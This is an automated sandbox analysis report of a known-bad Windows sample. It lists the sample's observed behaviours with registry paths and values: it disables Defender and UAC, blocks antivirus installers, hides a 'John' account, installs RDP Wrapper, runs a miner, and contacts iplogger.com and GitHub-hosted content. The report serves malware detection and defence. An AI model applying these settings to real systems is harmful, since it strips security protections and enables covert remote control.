Analysis Overview
SHA256
b072506b100e143611b6b01f8e4ac35115665771f6f25685d1e5f5426cc7f03b
Threat Level: Known bad
The file bd38e93c22ab359d615e7464fd252363_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies visiblity of hidden/system files in Explorer
Windows security bypass
Disables service(s)
Modifies Windows Defender Real-time Protection settings
RMS
NirSoft WebBrowserPassView
Grants admin privileges
Nirsoft
Stops running service(s)
Blocks application from running via registry modification
Server Software Component: Terminal Services DLL
Possible privilege escalation attempt
Drops file in Drivers directory
Modifies Windows Firewall
Sets file to hidden
ACProtect 1.3x - 1.4x DLL software
UPX packed file
Loads dropped DLL
Reads user/profile data of web browsers
Modifies file permissions
Executes dropped EXE
Cryptocurrency Miner
Checks computer location settings
ASPack v2.12-2.42
Checks whether UAC is enabled
Adds Run key to start application
Modifies WinLogon
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
Drops file in System32 directory
Hide Artifacts: Hidden Users
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Delays execution with timeout.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Script User-Agent
Suspicious behavior: LoadsDriver
Kills process with taskkill
Modifies system certificate store
Suspicious behavior: SetClipboardViewer
Scheduled Task/Job: Scheduled Task
Gathers network information
Runs net.exe
Suspicious use of WriteProcessMemory
Runs .reg file with regedit
Suspicious use of AdjustPrivilegeToken
System policy modification
Uses Task Scheduler COM API
Checks processor information in registry
Modifies registry class
Views/modifies file attributes
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 07:13
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 07:13
Reported
2024-06-19 07:16
Platform
win7-20240221-en
Max time kernel
150s
Max time network
147s
Command Line
Signatures
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
RMS
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\regedit.exe | N/A |
Grants admin privileges
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible privilege escalation attempt
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\rdp\RDPWInst.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Cryptocurrency Miner
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\windowsnode | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\hhsm | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\min | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\hs_module | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\WindowsDefender | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Programdata\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Programdata\Windows\winit.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\Programdata\Windows\winit.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\rdp\RDPWInst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\rdp\RDPWInst.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\Windows\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\WindowsTask\AppHost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\WindowsTask\AppHost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
